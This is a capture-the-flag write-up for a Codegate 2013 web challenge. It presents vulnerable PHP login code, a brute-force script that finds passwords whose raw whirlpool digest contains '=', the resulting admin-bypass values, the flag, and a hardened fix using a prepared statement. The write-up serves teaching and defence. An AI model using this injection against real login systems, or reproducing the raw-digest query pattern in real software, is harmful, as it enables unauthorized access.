Sunday, March 3, 2013

Codegate 2013 Quals - Web 100

We were given the source code of this challenge. To get the flag we have to login as 'admin'. Below is the php code:
$flag = "/flag.txt";
$id = $_POST['user_id'];
$ps = $_POST['password'];
mysql_connect("localhost","codegate","codegate");
mysql_select_db("codegate");

$id = mysql_real_escape_string($id);
$ps = mysql_real_escape_string($ps); // escaping happens here, before hashing

$ps = hash("whirlpool",$ps, true); // raw_output = true: a 64-byte binary digest that may contain ' or \
$result = mysql_query("select * from users where user_id='$id' and user_ps='$ps'"); // the unescaped digest is interpolated
$row = mysql_fetch_assoc($result);

if (isset($row['user_id'])) {
 if ($row['user_id'] == "admin") {
  echo "hello, admin<br />";
  die(file_get_contents($flag));
 } else {
  die("hello, ".$row['user_id']);
 }
} else {
 msg("login failed..");
}
The issue with the code is that hash() is called with $raw_output set to true, so it returns the raw binary digest, and it is that digest, not the escaped input, that gets interpolated into the query. Escaping before hashing therefore protects nothing, and any quote byte in the digest breaks out of the string literal, giving SQL injection. From the PHP manual:
string hash ( string $algo , string $data [, bool $raw_output = false ] )
raw_output:
When set to TRUE, outputs raw binary data. FALSE outputs lowercase hexits.
To bypass the login we need a password whose raw whirlpool digest contains the three bytes '=' (quote, equals, quote). The condition then becomes user_ps='...'='...', which MySQL evaluates as (user_ps='...')='...': the inner comparison is 0, and a string that does not start with a digit also converts to 0, so the condition is true.
<?php
// Try candidate passwords 0..9999999 and print those whose raw whirlpool
// digest contains the byte sequence '='
for($i=0 ;$i<10000000; $i++)
    if(strpos(hash("whirlpool",$i, true),"'='") !== false)
        echo $i."\n";
?>
[ctf@renorobert CodeGate]# php brute.php 
364383
527980
629987
708365
991410
1311789
1608604
1974557
^C
Logging in as admin with any of the above values as the password bypasses the check. The flag for the challenge is DAER0NG_DAER0NG_APPLE_TR33
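As an added example (not the challenge code), the two halves of the bug side by side in PHP: the vulnerable WHERE clause rebuilt in isolation, with addslashes() standing in for mysql_real_escape_string() (an assumption; the original needs a live connection and no longer exists in PHP 7), and a hardened login that uses the hex digest and a PDO prepared statement, assuming a PDO connection $db to the same users table.

```php
<?php
// Added example, not the challenge code.

// 1. The vulnerable construction, reproduced in isolation.
//    364383 is one of the passwords found by the brute force above: its raw
//    whirlpool digest contains the bytes '=' and lands unescaped in the literal.
function vulnerable_where(string $id, string $ps): string {
    $id = addslashes($id);                 // stand-in for mysql_real_escape_string()
    $ps = addslashes($ps);                 // escaping the *input* ...
    $ps = hash("whirlpool", $ps, true);    // ... is undone by interpolating the raw *digest*
    return "user_id='$id' and user_ps='$ps'";
}

$where = vulnerable_where("admin", "364383");
// user_ps='<bytes>'='<bytes>' : MySQL reads this as (user_ps='<bytes>')='<bytes>';
// the inner comparison is 0 and the trailing string converts to 0, so it is true.
var_dump(strpos($where, "'='") !== false);   // true for the values listed above

// 2. Hardened login: hex digest (raw_output defaults to false, so the value is
//    128 characters of [0-9a-f] and can never contain a quote) plus a prepared
//    statement, which sends the values separately from the SQL text.
function login(PDO $db, string $id, string $ps): ?string {
    $digest = hash("whirlpool", $ps);
    $stmt = $db->prepare("SELECT user_id FROM users WHERE user_id = ? AND user_ps = ?");
    $stmt->execute([$id, $digest]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row ? $row['user_id'] : null;
}
```

Either change alone closes the bypass; the prepared statement is the one to keep even if the digest encoding changes again.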
